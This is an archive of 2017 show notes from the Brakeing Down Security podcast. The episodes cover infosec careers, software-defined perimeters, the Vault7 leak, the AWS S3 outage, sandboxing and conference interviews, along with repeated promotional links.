https://www.gov.uk/apply-apprenticeship (links for Scotland & Wales on the same page).
https://www.thetechpartnership.com/about/ - employers drive the training for the type of employees they need.
Routes to employment - fast paced industry so 1) older pathways may not be relevant. 2) there are so many ways in to the industry pick the right one for you - there’s a difference between people who appreciate structured learning, are autodidactic, learn extra and over what’s expected, dev, risk, red/blue team, academic, hands-on, etc.
Internships (rarer, though some degrees offer a year in industry and will assist in making positions available)
Graduate schemes - very common, will give a grad opportunities to move around the business. Direct hires from uni.
IBM has a trade school - hiring 2,000 US Veterans in the next 5 years
https://www.axios.com/ibm-2000-jobs-exclusive-2317626492.html
Technical schools
http://www.browardtechnicalcolleges.com/
http://www.bates.ctc.edu/ITSpecialist
DoL apprenticeship programs
https://oa.doleta.gov/bat.cfm
Difference between ‘for-profit’ and ‘trade schools’
Internships = some companies are paying fat bank:
Washington State trades/apprenticeships
Mostly ‘blue’ collar positions
http://www.lni.wa.gov/TradesLicensing/Apprenticeship/Programs/TradeDescrip/
Few ‘technical positions’
Not sure there is an ‘apprenticeship’ in the US, outside of ‘internships’ that are given to college students
No ‘junior security architects’, or ‘junior pentesters’
Yet non-technical positions have junior slots
Manager / Senior manager, Project manager / Sr. Project manager
Difficulty in infosec apprenticeships
What are the ‘starter’ jobs?
IT related
Sysadmins
Log analyst
Useful links:
https://www.gov.uk/government/news/huge-response-to-join-cyber-security-apprenticeship-scheme
https://www.gov.uk/guidance/cyber-security-cni-apprenticeships
https://www.ncsc.gov.uk/new-talent
All available apprenticeships:
https://www.gov.uk/government/collections/apprenticeship-standards
Employer commitments:
https://www.gov.uk/take-on-an-apprentice
For people looking to pivot from non-Infosec jobs into cyber security:
https://cybersecuritychallenge.org.uk/about/new-to-the-challenge
Published on: April 5, 2017
2017-011-Software Defined Perimeter with Jason Garbis
We talked with Jason Garbis this week about Software Defined Perimeter (SDP). Ever thought about going completely without needing a VPN? Do you think I just made a crazy suggestion and am off my medications? Google has been doing it for years, and organizations like the Cloud Security Alliance are expecting this to be the next big tech innovation. So much so, that they are already drafting version 2 of the SDP guidelines.
So after talking with a friend of mine about how they were trying to implement it, he suggested talking to Jason, since he was on the steering committee for it. While Jason does work for a company that sells this solution, our discussion with him is very vendor agnostic, and he even discusses an open source version of SDP that you could implement or test out as a PoC (details in show notes below).
This is a great topic to stay on top of, as one day, your CTO/CIO or manager will come by and ask about the feasibility of implementing this, especially if your company assets are cloud based... So have a listen!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-011-Software_Defined_Perimeter.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
Itunes: (look for '2017-011') https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
-----
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---
Show Notes:
https://en.wikipedia.org/wiki/Software_Defined_Perimeter
https://cloudsecurityalliance.org/group/software-defined-perimeter/
Hmmm… seems like a standard created by companies selling their products for it
Have a product, create a problem, fix the problem...
How much alike is this to things like ‘Beyondcorp’?
http://www.networkworld.com/article/3053561/security/learning-about-sdp-via-google-beyondcorp.html
De-perimeterization - removing all the bits ‘protecting’ your computer
Treat your computers as ‘on the Internet’
https://en.wikipedia.org/wiki/De-perimeterisation
https://collaboration.opengroup.org/jericho/SPC_swhitlock.pdf
https://github.com/WaverleyLabs/SDPcontroller
2FA becomes much more important, or just plain needed, IMO --brbr
Questions:
How will development of applications change when attempting to implement these technologies?
If we allow deperimeterization of legacy apps (like Oracle products), with a complicated security model, how do you keep these older apps under control?
Can this cut down on the “Shadow IT” issue? Does the user control the certs?
How does this work with devices with no fully realized operating systems?
Phones, HVAC, IoT
Legacy SCADA or mainframes?
What is the maturity level of a company to implement this?
What minimum requirements are needed?
Asset management?
Policies?
Who/how do you monitor this?
More blinky boxes?
Will WAFs and Web proxies still function as expected?
Are there any companies companies were this is not a good fit?
What’s the typical timeline for moving to this network model?
What’s the best way to deploy this?
Blow up old network, insert new network?
Phase it in with new kit, replacing old kit?
Compliance
How do explain this to auditors?
“We don’t have firewalls, that’s for companies that suck, we are 1337”
Other than “scalability” (which seems like regular solutions would have as well) I’d like to know what real value they provide
Published on: March 29, 20172017-010-Authors Amanda Berlin and Lee Brotherston of the "Defensive Security Handbook"
Our very own Ms. Berlin and Mr. Lee Brotherston (@synackpse), veteran of the show, co-authored an #O'Reilly book called the "Defensive Security Handbook"
We talk with Amanda and Lee (or Lee and Amanda :D ) about why they wrote the book, how people should use the book, and how you can maximize your company's resources to protect you.
The best thing is that you can pick up the ebook right now! It's available for pre-order on Safari books (Link), or pre-order on Amazon.com (Link)
Hope you enjoy!
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-010-Defensive_Security_handbook.mp3
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
Itunes: (look for '2017-010') https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
Previous Lee Brotherston episodes:
Threat Modeling w/ Lee Brotherston
Lee fills in for Mr. Boettcher, along with Jarrod Frates
TLS fingerprinting application
#Bsides #London is accepting Call for Papers (#CFP) starting 14 Febuary 2017, as well as a Call for Workshops. Tickets are sold out currently, but will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more information at https://www.securitybsides.org.uk/
CFP closes 27 march 2017
------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: March 22, 2017
2017-009-Dave Kennedy talks about CIAs 'Vault7', ISC2, and Derbycon updates!
Wikileaks published a cache of documents and information from what appears to be a wiki from the Central Intelligence Agency (CIA).
This week, we discuss the details of the leak (as of 11Mar 2017), and how damaging it is to blue teamers.
To help us, we asked Mr. Dave Kennedy (@hackingDave) to sit down with us and discuss what he found, and his opinions of the data that was leaked. Mr. Kennedy is always a great interview, and his insights are now regularly seen on Fox Business News, CNN, and MSNBC.
Dave isn't one to rest on his laurels. For many of you, you know him as the co-organizer of #derbycon, as well as a board member of #ISC2. We ask him about initiatives going on with ISC2, and how you (whether or not you're a ISC2 cert holder). You can help with various committees and helping to improve the certification landscape. We talk about how to get involved.
We finish up asking about the latest updates to DerbyCon, as well as the dates of tickets, and we talk about our CTF for a free ticket to DerbyCon.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-009-dave_kennedy_vault7_isc2_derbycon_update.mp3
Youtube: https://www.youtube.com/watch?v=lqXGGg7-BlM
iTunes: https://itunes.apple.com/us/podcast/2017-009-dave-kennedy-talks-abotu-cias-vault7-isc2/id799131292?i=1000382638971&mt=2
#Bsides #London is accepting Call for Papers (#CFP) starting 14 Febuary 2017, as well as a Call for Workshops. Tickets are sold out currently, but will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more information at https://www.securitybsides.org.uk/
CFP closes 27 march 2017
------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
--show notes--
http://www.bbc.com/news/world-us-canada-10758578
WL: “CIA ‘hoarded’ vulnerabilities or ‘cyber-weapons’
Should they not have tools that allow them to infiltrate systems of ‘bad’ people?
Promises to share information with manufacturers
BrBr- Manufacturers and devs are the reason the CIA has ‘cyber-weapons’
Shit code, poor software design/architecture
Security wonks aren’t without blame here either
http://www.bbc.com/news/technology-39218393 -RAND report
Report suggested stockpiling is ‘good’
“On the other hand, publicly disclosing a vulnerability that isn't known by one's adversaries gives them the upper hand, because the adversary could then protect against any attack using that vulnerability, while still keeping an inventory of vulnerabilities of which only it is aware of in reserve.”
Encryption does still work, in many cases… as it appears they are having to intercept the data before it makes it into secure messaging systems…
http://abcnews.go.com/Technology/wireStory/cia-wikileaks-dump-tells-us-encryption-works-46045668
(somewhat relevant? Not sure if you want to touch on https://twitter.com/bradheath/status/837846963471122432/photo/1)
Wikileaks - more harm than good?
Guess that depends on what side you’re on
What side is Assange on? (his own side?)
Media creates FUD because they don’t understand
Secure messaging apps busted (fud inferred by WL)
In fact, data is circumvented before encryption is applied.
Some of the docs make you wonder about the need for ‘over-classification’
Vulnerabilities uncovered
Samsung Smart TVs “Fake-Off”
Tools to exfil data off of iDevices
BrBr- Cellbrite has sold that for years to the FBI
CIA appears to only have up to iOS 9 (according to docs released)
Car hacking tech
Sandbox detection (notices mouse clicks or the lack of them)
Reported by eEye: https://wikileaks.org/ciav7p1/cms/page_2621847.html
Technique: Process Hollowing: https://wikileaks.org/ciav7p1/cms/page_3375167.html
Not new: https://attack.mitre.org/wiki/Technique/T1093
**anything Mr. Kennedy feels is important to mention**
What can blue teamers do to protect themselves?
Take an accounting of ‘smart devices’ in your workplace
Educate users on not bringing smart devices to work
And at home (if they are remote)
Alexa,
Restrict smart devices in sensitive areas
SCIFs, conference rooms, even in ‘open workplace’ areas
Segment possibly affected systems from the internet
Keep proper inventories of software used in your environment
Modify IR exercises to allow for this type of scenario?
Reduce ‘smart’ devices
Grab that drill and modify the TV in the conference room
Cover the cameras on TV
Is that too paranoid?
Don’t setup networking on smart devices or use cloud services on ‘smart’ devices
Remind devs that unpatched or crap code can become the next ‘cyber-weapon’ ;)
Published on: March 14, 20172017-008-AWS S3 outage, how it should color your IR scenarios, and killing the 'whiteboard' interview
If you were under a rock, you didn't hear about the outage that #Amazon #Web Services (#AWS) suffered at the hands of sophisticated, nation-state... wah?
"an authorized #S3 team #member using an established #playbook executed a command which was intended to remove a small number of servers for one of the S3 subsystems that is used by the S3 billing process. Unfortunately, one of the inputs to the command was entered incorrectly and a larger set of servers was removed than intended."
Well... okay, so for companies that do regular IR response tests and have a good majority of their assets and production in cloud based services, is it time to discuss having the 'extreme' scenario of 'What do we do when [AWS|Azure|Google Compute] goes down?'
We also discuss an article about #developers who want to get rid of the #whiteboard #interview... is it as #discriminatory as they suggest, or is it just devs who aren't confident or lacking #skills trying to get hired? (see show notes below for links)
Finally, we talk about Ms. #Berlin's talk she will be giving at #AIDE on 6-7 April. It's gonna be a "hands-on" talk. What do we mean? Listen to our show and find out.
#AIDE - https://appyide.org/events/ $60
more info: https://appyide.org/1313-2/
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-008-AWS_S3_outage-IR_scenarios_white-board-interviews.mp3
#Bsides #London is accepting Call for Papers (#CFP) starting 14 Febuary 2017, as well as a Call for Workshops. Tickets are sold out currently, but will be other chances for tickets. Follow @bsidesLondon for more information. You can find out more information at https://www.securitybsides.org.uk/
CFP closes 27 march 2017
------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
---show notes---
AWS S3 outage (hopefully more information by the end of the week)
Massive outages - many sites down
IoT devices borked https://techcrunch.com/2017/02/28/amazon-aws-s3-outage-is-breaking-things-for-a-lot-of-websites-and-apps/
https://www.wired.com/2017/02/happens-one-site-hosts-entire-internet/
TL;DR of the S3 outage - "an authorized S3 team member using an established playbook executed a command which was intended to remove a small number of servers for one of the S3 subsystems that is used by the S3 billing process. Unfortunately, one of the inputs to the command was entered incorrectly and a larger set of servers was removed than intended."
Brian: Water sprinkler story…
Do we put too much stock in Amazon?
Email Story time: Recent IR exercise
Mostly AWS shop
“If we suspend reality” drinking game
World War Z “the 10th man”
Not the 1st time AWS was involved in an outage:
Realistic IR exercises need to examine the ‘ultimate’ bad…
Even if you’re in ‘suspend reality’ mode
http://blog.interviewing.io/you-cant-fix-diversity-in-tech-without-fixing-the-technical-interview/
No problem with copy/paste, hunting up functions, etc
Problem comes when failure to understand the code you’re using, and the integration of that code therein
Programming Interviews Exposed
LOVED this idea….
https://letsjusthackshit.org/platypuscon2016.html
“In the spirit of what brought this community together, we’re aiming to build a super hands-on event: that is, instead of a series of talks while you plan on missing to catch up with your friends at the cafe down the road, we’re putting together a full day of hands-on workshops where you can get your hands dirty and we can all help each other learn something new.”
Patreon - just pop a dollar
CTF Club - Tuesdays 9am Pacific / 6pm Pacific
Book club - Defensive Security Handbook - Starting 15 March
Published on: March 6, 20172017-007- Audio from Bsides Seattle 2017
Bryan had the pleasure of attending his 3rd Bsides Seattle a few weeks ago. Lots of great speakers, great discussion.
We have 3 interviews here this week:
Justin Case (@jcase) discusses some of his talk about hacking the Google Pixel, an HTC produced phone. We discuss why Android gets the 'insecure' moniker by the media, and whether it's warranted or not.
Next, Sam Vaughn (@sidechannel_org) talks about setting up the Crypto Village, why he does it, and what you can learn by solving these puzzles.
Finally, Matt Domko discusses his experiences with Bro, as well as using Bro for packet analysis and what is needed when analyzing packets...
If you are looking for some great content, a Bsides is nearby, just look around...
Other Twitter handles mentioned on the show...
@ben_ra
@firewater_devs (both phone hackers)
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-007-bsides_seattle_Feb2017.mp3
YouTube:
iTunes:
Bsides London is accepting Call for Papers starting 14 Febuary 2017, as well as a Call for Workshops. You can find out more information at https://www.securitybsides.org.uk/
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: March 1, 20172017-006- Joel Scambray, infosec advice, staying out from in front of the train, and hacking exposed
Joel Scambray joined us this week to discuss good app design, why it's so difficult, and what can be done to fix it when possible.
Joel also co-authored many of the "Hacking Exposed" series of books. We ask him about other books that could come from the well known series.
We also ask about why the #infosec person often feels like they need to protect their organization to the expense of our own position (or sanity) and how we as an industry should be not 'in front of the train', but guiding the train to it's destination, one of prosperity and security. Conversely, we also discuss why some positions in security are so short-lived, such as the role of CISO.
From SC magazine (https://www.scmagazineuk.com/joel-scambray-joins-ncc-group-as-technical-director/article/634098/):
"Security expert and author, Joel Scambray, has joined NCC Group as technical director. He will be based at the Austin, US office.
Scambray has more than 20 years of experience in information security. In his new role, he will work with some of the company's biggest clients using his experience in business development, security evangelism and strategic consultancy."
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-006-Joel_scambray-infosec_advice-hacking_exposed.mp3
iTunes (generic link, subscribe for podcast): https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
Brakesec Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
Bsides London is accepting Call for Papers starting 14 Febuary 2017, as well as a Call for Workshops. You can find out more information at https://www.securitybsides.org.uk/
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
-------
Show Notes:
Joel Scambray
In a bio:
“Joel’s words of security wisdom: Security is a type of risk management, which is about informing a decision. The security professional’s challenge is to bring the most evidence possible to support those decisions, both technical and non.”
Building and maintaining a security program
Which is better?
starting with a few quick wins
Or having an overarching project to head where you want to go
Starting companies (buyouts / stock options / lessons learned)
Hacking Exposed
Will you stop at ‘7’?
Will there be a “hacking exposed: IoT”?
Medical devices
What leadership style works best for you?
Things we couldn’t cover due to time:
Security Shift from network layer to app layer
Software defined networking, for example
How to set policies to keep your devs from running amok
------
Published on: February 19, 20172017-005-mick douglas, avoid bad sales people, blue team defense tools
Mick Douglas is always great to have on. A consummate professional, and blue team advocate for years now, he teaches SANS courses designed to help defenders against the forces of the red team, pentesters, and even bad actors.
But this week, we have a different Mr. Douglas. This week, he's here to talk about sales tactics, #neuro #linguistic #programming, leading the question, and other social engineering techniques that salespeople will do to get you to buy maybe what your company doesn't need, but thinks it does. We have some good times discussing ways to ensure the buying of your new shiny box at work goes more smoothly, what you should look out for, and ways to tell if they are over-selling and under-delivering.
Also, Mick has been working on a project near and dear to his heart. After discussing with @carnal0wnage a year or so back, he's fleshed out a spreadsheet that tracks attack vectors, and depending on what controls are in your environment, can show you how well a particular attack is against your environment. This would be a great asset to blue teams who might want to shore up defenses, especially if they are vulnerable in a particular area. Mr. Douglas is looking for comments, suggestions, and additions to his spreadsheet, and you can even download a copy of the Google Doc to try in your own environment, free of charge.
Book mentioned in the show: (non-sponsored link) https://www.amazon.com/Influence-Psychology-Persuasion-Robert-Cialdini/dp/006124189X
Mick's document:
https://docs.google.com/spreadsheets/d/1pI-FI1QITaIjuBsN30au1ssbJAZawPA0BYy8lp6_jV8/edit#gid=0
Mick refers the the MITRE ATTACK matrix in the show, here's our show discussing it:
http://traffic.libsyn.com/brakeingsecurity/2015-051-ATTACK_Matrix.mp3
https://attack.mitre.org/wiki/ATT%26CK_Matrix
Mick's last appearances on BrakeSec:
http://traffic.libsyn.com/brakeingsecurity/2015-024-Mick_Douglas.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-025-Mick_douglas_part2.mp3
http://traffic.libsyn.com/brakeingsecurity/2015-032-Jarrod_and_Mick_DFIR.mp3
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-005-mick_douglas-attack_defense_worksheet.mp3
iTunes: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
YouTube: https://www.youtube.com/watch?v=A3K-2yneKU4
Bsides London is accepting Call for Papers starting 14 Febuary 2017, as well as a Call for Workshops. You can find out more information at https://www.securitybsides.org.uk/
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: [email protected]
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/
Published on: February 14, 2017
2017-004-sandboxes, jails, chrooting, protecting applications, and analyzing malware
This week, we discuss sandboxing technologies. Most of the time, infosec people are using sandboxes and similar technology for analyzing malware and malicious software.
Developers use it to create additional protections, or even to create defenses to ward off potential attack vectors.
We discuss sandboxes and sandboxing technology, jails, chrooting of applications, and even tools that keep applications honest, in particular, the pledge(2) function in OpenBSD
----------
HITB announcement:
“Tickets for attendance and training are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-004-Sandboxing_technology.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-004-sandboxes-jails-chrooting/id799131292?i=1000380833781&mt=2
YouTube: https://www.youtube.com/watch?v=LqMZ9aGzYXA
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582
-----------
Show notes:
Sandboxing tech - https://hangouts.google.com/call/yrpzdahvjjdbfhesvjltk4ahgmf
A sandbox is implemented by executing the software in a restricted operating system environment, thus controlling the resources (for example, file descriptors, memory, file system space, etc.) that a process may use.
Various types of sandbox tech
Jails - freebsd
Much like Solaris 10’s zones, restricted operating system, also able to install OSes inside, like Debian
http://devil-detail.blogspot.com/2013/08/debian-linux-freebsd-jail-zfs.html
Pledge(8) - new to OpenBSD
Program says what it should use, if it steps outside those lines, it’s killed
http://www.tedunangst.com/flak/post/going-full-pledge
http://man.openbsd.org/cgi-bin/man.cgi/OpenBSD-current/man2/pledge.2?query=pledge
http://www.openbsd.org/papers/hackfest2015-pledge/mgp00008.html
Chroot - openbsd, linux (chroot jails)
“A chroot on Unix operating systems is an operation that changes the apparent root directory for the current running process and its children”
Example: “www” runs in /var/www. A chrooted www website must contain all the necessary files and libraries inside of /var/www, because to the application /var/www is ‘/’
Rules based execution - AppArmor, PolicyKit, SeLinux
Allows users to set what will be ran, and which apps can inject DLLs or objects.
“It also can control file/registry security (what programs can read and write to the file system/registry). In such an environment, viruses and trojans have fewer opportunities of infecting a computer.”
https://en.wikipedia.org/wiki/Seccomp
https://en.wikipedia.org/wiki/Linux_Security_Modules
Android VMs
Virtual machines - sandboxes in their own right
Snapshot capability
Revert once changes have occurred
CON: some malware will detect VM environments, change ways of working
Containers (docker, kubernetes, vagrant, etc)
Quick standup of images
Blow away without loss of host functionality
Helpful to run containers as an un-privileged user.
https://blog.jessfraz.com/post/getting-towards-real-sandbox-containers/
Chrome sandbox: https://chromium.googlesource.com/chromium/src/+/master/docs/linux_sandboxing.md
Emulation Vs. Virtualization
http://labs.lastline.com/different-sandboxing-techniques-to-detect-advanced-malware --seems like a good link
VMware Thinapp (emulator):
(continued next page)
Malware lab creation (Alienvault blog):
News: (assuming it goes short)
SHA-1 generated certs will be deprecated soon - https://threatpost.com/sha-1-end-times-have-arrived/123061/
(whitelisting files in Apache)
https://isc.sans.edu/diary/Whitelisting+File+Extensions+in+Apache/21937
http://blog.erratasec.com/2017/01/the-command-line-for-cybersec.html
https://github.com/robertkuhar/java_coding_guidelines
https://www.us-cert.gov/sites/default/files/publications/South%20Korean%20Malware%20Attack_1.pdf#
https://www.concise-courses.com/security/conferences-of-2017/
Published on: February 6, 20172017-003-Amanda Berlin at ShmooCon
Amanda Berlin attended Shmoocon this year, and sat down with a few people. She discussed a bit with John about what HackEd is about (http://hackeducate.com/)
Amands writes: "I had an amazing time at my 3rd #Shmoocon. I was able to interview a handful of really cool people working on several different types of infosec education. I was able to watch a few talks, spend some time in the lockpick village, as well as go to Shmoocon Epilogue. It’s always amazing to watch people talk about what they are passionate about, and Shmoocon is a great relaxed environment where that happens frequently."
James Green @greenjam94
Aaron Lint @lintile
Jon? @hackeducate
Melanie Rich-Wittrig @securitycandy
Amanda Berlin attended ShmooCon this year, and sat down with a few people. She discussed a bit with John about what HackEd is about (http://hackeducate.com/)
Melanie Rich-Wittrig (@securitycandy) discusses how she's empowering kids to get into information security, even as early as age 10 or 11. She discusses how she motivates by teaching CTF and hacking concept, and gamifying by using point systems.
www.securitycandy.com
RSS: http://www.brakeingsecurity.com/rss
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-003-ShmooCon_Audio.mp3
YouTube:
----------
HITB announcement:
“Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------
Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions? Contact us via Email: [email protected]
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
